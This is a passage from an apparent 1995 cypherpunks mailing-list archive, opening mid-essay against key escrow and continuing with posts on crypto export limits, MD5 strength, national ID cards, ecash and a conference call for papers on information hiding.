		require citizens to run their lives in such a manner 
		that any government search will be successful. For 
		more information on this, see the following World Wide 
		Web url: http://www.clark.net/pub/cme/html/avss.html
 
Since all Senators and Congressmen take an oath to preserve and defend
the constitution of the U.S., this should be the end of the argument.
However, watching some of the stupid laws that have come out of congress
in past years, tells me I should supplement the above with additional
argument.
 
I am not a lawyer and I am not trying to be one. I have no opinion as to
whether private cryptography regulations will be found unconstitutional.
There are a number of cases where out courts have made decisions which
do great violence to the plain meaning of the text of our constitution.
Knowing what the courts will actually do is the business of lawyers.
Understanding the constitution so that one may know what the courts 
should do should be the business of every citizen.
 
2) The excellent NRA argument "when guns are outlawed only outlaws
will have guns" applies with equal force to cryptography! Professional
criminals will circumvent with ease any government regulations on
cryptography. Billions of bytes travel the internet yearly. The techniques
of steganography make it absolutely trivial for any motivated person to 
conceal any encrypted messages. The Big Brother cryptography regulations
will affect only ordinary citizens.
 
3) Cryptography is already in use by legitimate business. Any government
regulation of cryptography will probably cost huge amounts of money for
software and hardware costs for existing systems to be changed to a form
that the government approves. The existing ITAR regulations probably
cost the U.S. economy large amounts of money because U.S. companies can
not market cryptography software internationally. For information, see: 
http://www.eff.org/pub/Crypto/ITAR_export/tis_walker_export_101293_hr.testimony

By discouraging private cryptography, the ITAR regulations probably
enables a large amount of computer crime since it makes it difficult for
people to protect themselves. The ITAR regulations have not and can not
prevented strong cryptography from making it outside  the U.S. How many
tons of cocaine illegally enter the U.S. every year? Yet the government
ITAR regulations propose to regulate the export of software that can fit
in a shirt pocket, or travel by wire concealed with  billions of bytes
of data that leave the U.S. every year. It is time for the U.S.
government to start living in the real world!
 
According to an article in the August 17, 1995 Wall Street Journal, ITAR
regulations have required Netscape to use inferior encryption methods in
the international version of its World Wide WeB browser software. This
inferior encryption method has actually been broken by a French Hacker!
Because of its computational intensity, this weakness in the encryption
method does not represent an immediate danger. However as more powerful
computers continue to develop, this and similar vulnerabilities will
present a danger for those who wish to use the internet for commerce.
For more information, see:
http://pauillac.inria.fr/~doligez/ssl/
 
4) These regulations make it impossible for an individual to have
greater privacy than the U.S. government. The Adlrich Ames case makes it
clear that the U.S. is incompetent to keep a secret. 
 
5) The proposed regulations require the American people trust the
government, but on the contrary, the government should be required to
trust the American people. Recent news stories (Waco ect.) make  it
clear that it is common for government agents to lie to get a search 
warrants. Government should be viewed as George Washington did as  "a
fearful servant and a dangerous master".
 
A recent poll conducted by the Americans Talk Issue Foundation said 76%
of the people questioned responded that they rarely or never trust
"government to do what is right". This mistrust is well founded.  At the
same time as administration sources were saying that key escrow schemes
would remain voluntary, FBI, NSA, and DOJ experts were saying that the
schemes must be made mandatory if they were to be at all effective. If
the government is willing to lie to establish a key escrow key system,
what makes us believe that the government will not lie when applying for
warrants to use that system? For more information on this, see:
http://www.efh.org/pgp/fbilie.html
 
If any key escrow system is adopted, the secret FISA court will
undoubtedly be given the power to issue  warrants for decryption keys.
The FISA court has granted over  7,500 wiretap requests in complete
secrecy with only one refusal. The secrecy of this court creates a great
opportunity for abuse. If the court is lied to, the lie is not exposed,
because the people with an interest in exposing the lie do not know the
lie exists. If the court grants legally unwarranted warrants, there is
no one to appeal or to try to stop the practice, because no one knows
about the problem. For information, see:
http://MediaFilter.org/MFF/CAQ/caq53.court.html
 
6) It is too humiliating to require a free people to participate in the
establishment of their own surveillance prisons. This is  what key
escrow requires. Consider the words of our revolutionary heritage:
 
	Those who would sacrifice essential freedoms for temporary safety
	deserve neither. Benjamin Franklin
 
	If ye love wealth greater than liberty, the tranquility of servitude
	greater than the animating contest for freedom, go home from us in
	peace.  We seek not your counsel, nor your arms.  Crouch down and 
	lick the hand that feeds you; and may posterity forget that ye 
	were our countrymen. Samuel Adams
 
Do you think that these men would approve the government's key escrow
requests?
 
This information can also be found at the following url:
http://www.efh.org/pgp/rant.html
- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMFA5K/BUQYbUhJh5AQGOjAP+OyDEtAJGL32S8IK+HGAfaOTkpCI18SCL
QvSTaknPd5J2m+yzamGD88Z2YJKwW1M+2GgqGqsclCpI+KCvSp2Z9h1KXWT6ANGR
MXTuK3fjVmlvp5lqZAwHb133qL97e60MIq+5lK26FPaGzBCr7ckPMF0cvM+mm4dW
dyc1uuXaZg0=
=bVzd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 10:43:41 PDT
To: cypherpunks@toad.com
Subject: 64-bit GAK && 128-bit hashes
Message-ID: <9509081743.AA03448@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


The recent guidelines for proposed export regulations from NIST include  
64-bit keys and several people here have commented that this implies NSA  
ability to brute-force 64-bit keys now or in the near future ("belt and  
suspenders").  How does this bode for 128-bit hash functions such as MD5?  If  
64-bit encryption algorithms can be brute-forced, could birthday attacks and  
the like on 128-bit hashes be feasable as well?  Perhaps the crypto community  
should start serously considering moving away from MD5 and towards 160-bit  
hashes such as SHA or even 256-bits...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 8 Sep 95 10:05:26 PDT
To: cypherpunks@toad.com
Subject: Hacking banking (fwd)
Message-ID: <Pine.SOL.3.91.950908125820.14938A@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 8 Sep 95 15:21:00 UTC
From: d.wiesner@genie.geis.com
Subject: Hacking banking

 
An interesting article appeared on Page B1 of the 9/7/95 San
Francisco Examiner.  Titled "Keystroke Cops," it discusses the FBI's
new cyberswat team.  In the midst of a routine discussion of whether
law enforcement needs to keep up with cyberspace criminals, the
following intriguing quote appeared.
 
"Already, Fuentes said, federal authorities in New York are
investigating whether programmers hired to write software for a
financial institution may have left a 'back door' open in the
program, one through which money may have been diverted to foreign
bank accounts."
 
Does anyone know what this federal investigation in New York is
about?   How about copying this note around and seeing what people
can find out?
 
David Wiesner

----

My pleasure, Dave.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 13:06:19 PDT
To: Doug Hughes <doug@Eng.Auburn.EDU>
Subject: [NOISE] Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509082006.NAA24844@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 PM 9/7/95 -0500, you wrote:
>> Sorry for the typo, yes, I meant sham, fake, theater, all smoke  and
>> mirrors, nothing sincere, etc. See reference to "stage" above.
>> 
>In this context, I think burlesque fits remarkably well. ;)
>(Brings to mind a bunch of cross-dressors doing big theatre numbers
>in exotic costumes)

"I never wanted to be an eavesdropper - I wanted to be a ... lumberjack!"

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 13:08:20 PDT
To: hallam@w3.org
Subject: Re: ON OFF-TOPIC   [NOISE]
Message-ID: <199509082006.NAA24898@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 9/7/95 -0400, Phill wrote:
>>Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
>>that it is none of the government's business what we think or want to 
>>share with our computers.
>Poor you, the only major political party to come out with a pro crypto
statement 
>is a socialist party.

But - wait!  Of course you're not a patriot - You're a foreigner!  Oh, no! :-)

>The problem is currently with the right wing, right wing democrats such as 
>Clinton and practically all the Republicans. 

As you later point out, it's really an authoritarian/libertarian issue,
(though it's at least nice to hear somebody else who realizes Clinton's
no liberal :-); it affects both economic control/freedom issues
and freedom of speech issues as well.  A lot of the Republicans,
mainly the newly elected ones, are less anti-crypto, partly because
they're pro-business, and sometimes pro-free-speech, but also because
they're not as closely tied in to the authoritarian power structure the
way Bush and Clinton have been.

>If you want a debate on how to convince the authoritarians then perhaps you
will 
>get some interest. 
That'll be tough.  The military and police can already get good crypto, 
as can other gov't agencies that want to use it to increase their power.  
Crypto can also be really effective for National ID cards, but I'd really rather
not encourage them to think along those lines at all, even using Chaum
techniques.
You can use it to hide campaign contributions and bribes, but of course they
probably don't want to admit that in public.  If everyone in the government
were to use key-escrowed phones, folks like Ollie North would probably realize
they had to be careful with their communications, but it would at least let
gentlemen read each others' mail...

Is there something authoritarians want, that we don't mind them having,
for which crypto would be an enabling technology?  Some of them _might_
be interested in having better encryption for TV channels so that kids
can't watch a NotForKids channel (though many of them might rather ban
it outright) or so they can easily control whether their kids get to
watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit.
Perhaps they'd enjoy having reputation systems available, so they can
easily filter out politically incorrect material, or do a thumbs-down
on things they disapprove of, or let the Baptists and Catholics and
Anti-Baptists all have their own convenient ratings.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 13:07:37 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509082006.NAA24910@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > Telecoms will certainly break the professional 
>> > monopoly of lawyers (and other professionals).
>> This I don't.  How do you mean exactly?
>Licensing requires the ability to outlaw unlicensed transactions.  
>Since the Net trumps censorship and allows consultations at a 
>distance, it cracks licensing,

It does reduce the ability of geographical organizations
to restrict who does business there, so markets will probably
force some shakeups in jurisdictions.  But lawyer work seems
to mostly involve either contracts or courts - as long as 
courts are still run by governments, they can restrict who
gets to practice in them, and who's allowed to write paper that
they'll judge disputes about.  Crypto _could_ be used for
a modern version of the Stamp Tax - documents might need to 
be digitally signed by Certified Lawyers (though of course
that may be lawyers putting their stamps on work mostly done
by clerks.)  

Crypto may make it easier to resolve some kinds of disputes,
by identifying who did what when, but the net isn't going to
make the number of disputes decrease....
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Sep 95 10:22:19 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Car rentals, Driver's Licenses, Ecash, & Net Access
Message-ID: <199509081721.NAA00705@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green's reply to someone else motivated me to comment:

>>Suppose you have acquired a million dollars worth of legal, above-board
>>DigiCash dollars and you want to surreptitiously transfer this wealth to a
>>below-board friend.  Your friend creates a temporary anonymous account at an
>>understanding bank.  Y
>
>Won't work. Ecash, except as used for frequent flyer like points, will
>exist in only *one* world wide e$ currency, issued by a single entity
>composed of various major banks and subject to US laws. Getting Ecash
>accounts will therefore be subject to the same legal requirements that
>apply to normal US checking accounts.

For the holiday weekend, I rented a car at a major agency in the state where
I usually sleep.  To secure the rental, I presented a driver's license from
another state and a secured VISA card.  The agency presented me with a car
bearing the license plates of a Southern state far away from the rental
location.  In the past, this agency (one of the majors BTW) had given me a
car registered in yet another Southern state for a week's rental bearing a
registration that expired halfway through that week.  No problems in any case.

Interestingly enough, the agency refuses to rent to local citizens of the
state where it is located and where I often sleep.  My posession of a
"foreign" DL makes it easier for me to rent cars.  Money and imagination
overcomes many of the "social control" aspects of licensing and registration
requirements.

Now what this all has to do with transaction controls is the following.  It
is suggested that governments and private parties will cooperate in imposing
absolute restrictions on people's ability to complete "unlicensed"
transactions.  Thus it is suggested that driving, posession of a motor
vehicle, working for pay, having a bank account, having a phone account,
having a net account can all be rigidly controlled.

We've all read the stories about the DMV and how various states are pulling
licenses for child support arrears, tax evasion, overdue library books, etc.
The Feds have proposed a National SS# Database that would have to be
consulted before the 60 Million people who annually change jobs would be
allowed to do so.  And it is easy to imagine that additional restrictions
would soon be placed on job changes.  After all, we don't want deadbeat
dad-tax evading-library book hoarders working in this country, do we?
Likewise the Bank Secrecy Act of 1970, et seq was supposed to end anonymous
bank accounts.  And a lot of the recent porn on the nets agitation has
involved attacks on anonymity.  Suggestions have been made for licensing net
access.  Finally, electronic check proposals are supposed to be traceable
because those who open accounts will be identified.

The readers of this list can apply what they already know about the
difficulty involved in restricting net access to the analysis of these other
existing and proposed restrictions.  The problem with the theory of
transaction blocking is that it requires millions of potential sellers of
goods, services, and jobs around the world to turn away customers.
Something that most people are unwilling to do.

Thus, if some entity tries to control net access by restricting it to
"licensed" users --- a real legal problem in the US BTW --- all that you
have to do is open an account somewhere else on earth and dial out to it or
use a connection via an X25 network.  All the Great Enemy can do is make you
spend a little more money.  Eventually of course, encrypted untraceable
TCP/IP sessions will be possible and domestic ISPs could -- without risk ---
offer "encrypted only" pipes out to the nets.  "Once you get there it's up
to you what you do but we don't/can't know about it."  

Note that soon, millions of people will have high-speed, cable-based,
full-time net access.  These people will be one mouse click away from being
a full-service ISP.  Stick the ISP in a Box BSD CD-ROM in the drive and
double-click on setup.exe.  If the CD-ROM is produced by the right parties,
it will automatically support encrypted TCP/IP.  These millions of ISPs can
offer net-access accounts right away and add dial up later for the neighbors
if they feel like it. 

It is the vast number of vendors and the cheapness of the connection that
makes it so hard to control net access.  The computer and telecoms
revolution has the same effect on banking and other services to which the
authorities hope to block access.

Thus cheap telecoms, computing power, and well-developed electronic funds
transfer systems are easily turned into free banking.  We all know that
every node/user on the net is a potential gateway to another network
(potentially of great size) on the "other side" of his connection.  In the
same way, every user of "cheap, easy, and open" electronic funds transfer
system is a potential bank, a potential money "switch".  The famous Fort Lee
Switch located in Fort Lee, New Jersey at the West end of the George
Washington Bridge is an important switch for the financial funds transfer
networks going into and out of NYC.  Think of it as the IBM 360 running a
proprietary operating system on a somewhat closed loop.  The future open
funds transfer systems will be like the personal computers that can far
exceed the performance of the old monopoly mainframes.  

Since everyone will be able to switch funds (and every *one* includes every
fictitious entity, software agent, corporation, trust, organization, or firm
anyone can create on earth) they will be able to switch funds for anyone
else.  Controlling a system with an almost unlimited number of switch points
will not prove possible.

Individuals and the entities they control can be counted on to protect
themselves from the financial losses occasioned by fraud or theft.  They can
be their own auditors.  But they can't be counted on to forego profit so
that the governments of the world can try and prevent some people from
engaging in mutually beneficial private transactions.

An attempted cartel of that sort --- one that tries to enlist the billion or
so people who will be easily and reliably switching funds within a few years
--- is doomed to failure.  Too many potential 'cheaters.'  Too much money to
be made by breaking with the cartel and offering financial services to
others who wish to use them.

And where money leads, other forms of human interaction will follow.  Once
money is free it can buy, bribe, or finagle it's way past the other
attempted restrictions on voluntary transactions.  

DCF

"If you can figure out a way to keep 1 billion people who have cheap,
powerful, uncensored, computers and telecommunications from being free;
you're a better man than I am Gunga Din."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 8 Sep 95 10:32:50 PDT
To: cypherpunks@toad.com
Subject: (Fwd) CFP: Workshop on Information Hiding
Message-ID: <9509081732.AA26869@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This was on the www-security list.

------- Forwarded Message Follows -------
Date: Mon, 28 Aug 95 12:11:06 EDT
From: allegra!slow@uunet.uu.net (Steven H. Low)

There's a www version on 
	http://www.cl.cam.ac.uk/users/rja14/ihws.html


=================================================================


		Workshop on Information Hiding 

		    First Call for Papers 

		     30 May - 1 June 1996

	Isaac Newton Institute, University of Cambridge, UK


Many researchers are interested in hiding information or in stopping other
people doing this. Until now, their efforts have been fragmented, with
different groups interested in copyright marking of digital objects, covert
channels in computer systems, subliminal channels in cryptographic
protocols, broadcast encryption schemes, low-probability-of-intercept
communications such as spread spectrum and meteor scatter, and various
kinds of anonymity services ranging from steganography through location
security to digital elections.

However these areas of study are closely linked, and we wish to create an
opportunity for a fruitful exchange of ideas. We are therefore organising a
workshop on information hiding, which will form part of a six month
research programme being held at the Isaac Newton Institute on Computer
Security, Cryptography and Coding Theory. Given a positive response
from the research community, it is hoped that this will become a regular
event.


Instructions for authors:

Interested parties are invited to submit papers on research and practice
which are related to these areas of interest. Submissions can be made
electronically (latex or postscript; preferred format is latex using llncs.sty)
or in paper form; in the latter case, send eight copies suitable for blind
refereeing (the authors' names should be on a separate cover sheet and there
should be no obvious references). Papers should not exceed fifteen pages in
length.


Addresses for submission:

ross.anderson@cl.cam.ac.uk

Ross Anderson, Cambridge University Computer Laboratory, Pembroke
Street, Cambridge CB2 3QG, England


Deadlines:

Paper submission:               31st December 1995
Notification of acceptance:     29th February 1996
Camera-ready copy due:          31st March 1996 


Program committee:

Ross Anderson (Cambridge University)
Steve Low (AT&T Bell Laboratories)
Ira Moskowitz (US Naval Research Laboratory)
Andreas Pfitzmann (Technical University of Dresden)
Gus Simmons (University of New Mexico)
Michael Waidner (IBM, Zuerich)




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Fri, 8 Sep 95 10:40:11 PDT
To: mark@unicorn.com (Rev. Mark Grant)
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <Pine.3.89.9509081833.A4038-0100000@unicorn.com>
Message-ID: <9509081739.AA20098@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


> 
> On Fri, 8 Sep 1995, Tom Rollins wrote:
> 
> > I took a look at the FACTNet web page.  There is a file encrypted with
> > PGP using the "-c" option.  They are asking for people to help guess
> > the Pass Phrase.  Why would anyone bother if they had no clue that the
> > file contained anything 'interesting'.
> 
> I can only assume one of two things - either this is a joke, as the
> decrypted contents are nothing special as far as I can see (though
> 'interesting' in a sense), or that someone is very, very clever and
> managed to hide two different messages in there with different
> passphrases.
> 
> > If this is the file that the Co$ is trying to crack, then what the
> > is being asked for is a pass phrase that can be handed to the Co$ that
> > will pass the PGP valid key check and still not decrypt the data to
> > anything usefull.
> 
> If this is the file the Co$ want to crack, they're a) clearly 
> cryptographically inept, and b) the joke's clearly on them 8-).. Any 
> hacker worthy of the name ought to get the passphrase within three 
> attempts (I got it first time).
> 
> Note for paranoids: Of course, this message may just be a ruse to put 
> the Co$ off the scent ;-)..
> 
> 	Mark

Ooops, I see what you mean.  It is funny !
I simply did not take this at face value.

-tom



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Fri, 8 Sep 95 14:04:51 PDT
To: cp-lite@comsec.com
Subject: Cypherpunks Lite archives now available
Message-ID: <199509082050.NAA22694@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


I've made available archives of the last 8 months of Cypherpunks Lite
for your perusal.

	ftp://ftp.crl.com/users/co/comsec/cp-lite

One year subscriptions are available for $20.  To subscribe, send check
or money order to:

	COMSEC Partners
	1275 Fourth St., Suite 194
	Santa Rosa, CA 95404.

Be sure to indicate your email address and whether you want
message-by-message delivery or a daily digest.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 8 Sep 95 05:09:39 PDT
To: cypherpunks@toad.com
Subject: Re: fast modular reduction (proof?)
Message-ID: <9509081207.AA02681@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Oops, sorry for sending it twice. After the first mail
I got an error message which said the mail wasn't delivered
because it contained control characters. I thought the first
mail didn't go out.
Hadmut :-(





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 8 Sep 95 11:16:47 PDT
To: cypherpunks@toad.com
Subject: Privacy book list
Message-ID: <95Sep8.141612edt.4207@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I got a letter in the mail today from Plenum Publishing Corp in NY,
advertising a book called _Mind Your Own Business: The Battle for
Personal Privacy_ by Gini Graham Scott.  It seems I am on a
mailing list for privacy freaks.  Oh the irony!

They must have gotten my name from somewhere.  The only two sources that
I can think of are the lists for CFP '94 and '95, and a
revolver club that I used to be a member of.  Has anyone else on the 
list gotten this ad? 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 11:25:35 PDT
To: Matthew Ghio <ghio@c2.org>
Subject: Re: Commercial Speech over Internet product
In-Reply-To: <m0sqray-0012qWC@myriad>
Message-ID: <Pine.SUN.3.91.950908142327.4660B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Matthew Ghio wrote:

> The program is a sound-listening extention for web-browsers.  There is
> really no use for crypto because it's only processing information which
> is already public.

I can easilly imagine pay recorded sex lines or pay stock market analysis 
via this service, either of which you might want to have encrypted.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 11:42:54 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Correction about who opposes crypto regulations....
In-Reply-To: <ac75051735021004fa02@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950908142844.4660D-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Timothy C. May wrote:

> On the contrary, the Libertarian Party has come out strongly in favor of
> cryptography and privacy, and they are consistently either #3 or #4 in
> popularity.

The US Libertarian Party Platform supports crypto, and the LP has issued
press releases critical of the FBI Telecom (wiretapping) Bill and Clipper. 
The LP was also part of the coalition against internet censorship this
year. 

The LP is the third largest political party in the US, and party members
hold over 150 elected and appointed public offices in the U.S.  They will
again have a presidential candidate on the ballot in all 50 states next
year as they did in the last election, and a potential LP presidential
candidate (Harry Browne, http://www.rahul.net/browne) will be in the
CityVote debates which will be nationally televised next month.  The LP
was also the first party to have a female candidate who won an Electoral
College vote.  For more details on the LP, you should go to 
http://www.lp.org/lp

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 8 Sep 95 11:57:31 PDT
To: "Cortland D. Starrett" <cort@bioanalytical.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID: <Pine.BSD/.3.91.950908144400.18201E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


We wish!  We really wish!

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@escape.com| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 11:45:51 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
Message-ID: <Pine.SUN.3.91.950908144336.4660E-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Yih-Chun Hu wrote:

> Whatever. Clinton proposed crypto, some democrat wrote the electronic
> decency act. (In fact Gingrich was against it)

Nevertheless, Gingrinch did not flinch when internet censorship 
ammendments to the telecom bill went right by him in the House.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 8 Sep 95 11:57:33 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Looking for IETF old-timers (and others)
Message-ID: <Pine.PMDF.3.91.950908145510.541122815A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've put up on a web page some parts of a paper I am writing on Internet 
jurisprudence.  I'd welcome comments from anyone (this is a very early 
draft), but especially from any IETF old-timers, as the paper has a lot 
about the early days of internet standardmaking.

The URL is http://www.law.miami.edu/~mfroomki/ils/ils.htm

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 12:20:21 PDT
To: cypherpunks@toad.com
Subject: Cato Study Release:  National ID Card Ineffective and Intrusive
Message-ID: <Pine.SUN.3.91.950908151745.4770A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



CATO STUDY RELEASE

September 7, 1995

National ID card ineffective and intrusive, study says

Congressional Republican proposals to create a national
computerized registry and an ID card for all American workers
would establish "a dangerous, invasive, and unworkable new
expansion of federal police-state powers," according to a new
Cato Institute study.

In "A National ID System: Big Brother's Solution to Illegal
Immigration" (Policy Analysis no. 237), John J. Miller and
Stephen Moore say Sen. Alan Simpson (R-Wyo.) and Rep. Lamar Smith
(R-Tex.) are taking the "critical first step" toward implementing
a potentially invasive national worker authorization system. 
Moore is director of fiscal policy studies at the Cato Institute,
and Miller is vice president of the Center for Equal Opportunity.

An Orwellian system

The authors say that Smith and Simpson want to require an ID card
and computerized worker registry for the 150 million Americans
and legal immigrants in the U.S. labor force.  Sen. Dianne
Feinstein (D-Calif.) wants that national ID card to include such
information as a photograph, fingerprint, and retina scan.

The study says such a system would, in effect, "require employers
to submit all of their hiring decisions for approval to a federal
bureaucrat."  The authors call the proposed registry and national
ID card "Big Brother's solution to illegal immigration."  They
say the national ID card would

    constitute a massive invasion of privacy and violation of
     basic civil liberties;

    cost the government $3 billion to $6 billion to implement; 

    subject workers to the effects of potentially huge error
     rates, with perhaps millions of legal aliens denied jobs
     because of faulty government databases (even a 2 percent
     error rate would lead to 1.3 million Americans being
     wrongfully denied jobs);

    increase discrimination against Latin and Asian Americans;
     and, ultimately,

    fail to affect illegal immigration.   

Moore and Miller say that, once established, the computer
registry could be easily expanded and applied to other areas,
vastly increasing the size and scope of government. Some of the
potential uses of the system include

    implementing a Clinton-style health care plan and security
     card;

    ensuring employer compliance with affirmative action
     requirements; 

    tracking child support payments; 

    verifying that parents are getting their children
     vaccinated; and 

    conducting background checks on would-be gun purchasers,
     among others.

Better approaches available

After spending a year defeating the Clinton administration's
health security card, Moore and Miller say, the new GOP Congress
now wants every American to carry a "work authorization card"
that would create similar potential for intrusion and abuse.

The authors claim there are ways to address the problem of
illegal immigration that would expand, rather than curtail,
Americans' basic freedoms.  We could, for example,

    expand legal immigration quotas, 

    eliminate employer sanctions law,

    establish greater economic integration between the United
     States and Mexico, 

    restrict welfare eligibility of legal and illegal
     immigrants,

    facilitate the deportation of criminal aliens,

    tighten visa control, and

    improve border enforcement.

Why it matters

It is an iron rule of politics that whenever there is a perceived
"crisis" in Washington, Congress responds by passing bad laws
that expand the powers of government.  Moore and Miller say the
immigration issue is fertile ground for such laws. The
implications of a national ID system would range far beyond
today's debate over illegal immigration. The study says the
proposed worker registry system has no redeeming feature. It will
not curtail illegal immigration, and it will create opportunities
for abuse. At a time when Americans are loudly demanding more
freedom and smaller government, Moore and Miller say a computer
registry is a giant step in the wrong direction.

                           





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Fri, 8 Sep 95 12:38:19 PDT
To: Tom Rollins <trollins@hns.com>
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081620.AA19816@dcn92.hns.com>
Message-ID: <Pine.A32.3.91.950908152050.49741B-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Sep 1995, Tom Rollins wrote:

> If Larry Wollersheim does have the valid key.  It would be a simpler
> process to know what fake key to use and work it backwards through
> the MD5 to arrive at an ascii string to produce the fake key.
> 
> Too bad this wouldn't be plausable for the secret ring.  Perhaps PGP
> needs an option to specify the key in Hex and make the process easy.

Here's another option.  I just have no idea if it is possible, nor how it
would be implemented!  PGP could allow for an alternate secret key and a
boilerplate document.  This document would be "overlaid" or appended to
the target file at encryption.  When the safety is finally removed from
the gun at your head (sorry for the drama) you hand over your alternate
secret key.  The encrypted file is wiped until it reaches a marker; the
remainder of the file is displayed.  If you are forced to turn over keys
some day (and I think there is at least a reasonable likeihood of that) 
then They will have a much harder time arguing "But that's not what the 
file *really* said and, deep inside of me, I know it!".  At that point, 
with a secure wipe going on while the "decryption" was taking place, you 
have done the best you could.  I agree- a search warrent gives 
authorities the right to search your home (or disk)- not a guarantee that 
they'll find what they're looking for.
 
===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
